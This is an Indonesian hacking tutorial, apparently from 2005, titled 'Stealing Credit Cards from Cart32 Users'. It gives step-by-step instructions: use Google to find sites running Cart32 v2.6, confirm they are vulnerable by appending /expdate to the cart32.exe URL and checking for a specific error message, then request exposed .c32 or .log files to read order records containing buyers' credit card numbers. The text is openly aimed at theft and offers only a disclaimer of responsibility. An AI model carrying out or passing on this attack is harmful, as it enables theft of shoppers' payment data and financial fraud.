Mencuri Kartu Kredit dari Pengguna Cart32


  • SPYRO KiD
  • admin[~@t~]spyrozone[~d.t~]net
  • Thursday, September 15th, 2005
  • CopyLEFT (c) 2011++ www.spyrozone.net All Rights Reserved


Cart32 adalah adalah aplikasi shopping cart yang dibangun dengan Visual Basic, MySQL dan komponen HTML. Artikel ini akan memandu Anda untuk mendapatkan nomor kartu kredit dari website-website pengguna Cart32 v2.6. Segala penyalahgunaan atas informasi ini sepenuhnya menjadi tanggung jawab Anda.

Langkah 1

Gunakan Google untuk mencari target dengan struktur URL sebagai berikut:

www.alamat-target.com/cgi-bin/cart32.exe

Langkah 2

Tambahkan /expdate pada akhir URL yang sudah Anda temukan sehingga menjadi demikian:

www.alamat-target.com/cgi-bin/cart32.exe/expdate

Jika keluar pesan error seperti demikian:

Cart32 v2.6 Error
CART32 Build 443
The following internal error has occurred: Type mismatch Error Number = 13
Click Here For Possible Solutions
Please note what you were doing when this problem occurred, so we can identify and correct it. Write down the Web page you were using, any data you may have entered into a form or search box, and anything else that may help us duplicate the problem. Then contact the administrator of this service:

maka Anda berhasil mendapatkan target yang vulnerable.

Langkah 3

Carilah file .c32 atau file .log pada Cart32 Setup Info and Directory. Lalu panggil file tersebut pada URL yang sudah Anda temukan dengan format demikian:

www.alamat-target.com/cgi-bin/cart32/FILE-LOG-YANG-ANDA-TEMUKAN

Akan keluar informasi order, lengkap dengan nomor kartu kredit pembelinya.

Sekian, semoga bermanfaat ;)


//E.O.F